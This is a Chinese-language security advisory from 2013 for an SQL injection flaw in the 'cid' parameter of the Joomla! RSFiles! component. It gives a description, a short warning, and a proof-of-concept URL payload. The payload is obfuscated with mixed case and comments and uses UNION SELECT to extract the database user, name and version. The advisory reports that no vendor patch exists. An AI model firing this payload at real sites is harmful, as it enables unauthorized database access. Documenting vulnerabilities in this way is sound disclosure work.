Joomla! RSFiles! 组件'cid'参数SQL注入漏洞

发布日期:2013-03-18
更新日期:2013-03-19

受影响系统:
Joomla! RSFiles!
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58547
 
Joomla! RSFiles!是Joomla! 1.5 / 2.5下载过滤器。
 
Joomla! RSFiles!组件没有正确过滤'cid'参数,在实现上存在SQL注入漏洞,成功利用后可允许攻击者执行未授权数据库操作。
 
<*来源:ByEge
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
?
 
option=com_rsfiles&amp;amp;view=files&amp;amp;layout=agreement&amp;amp;tmpl=component&amp;amp;cid=1/**/aNd/**/
 
1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Joomla!
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyyxzg.html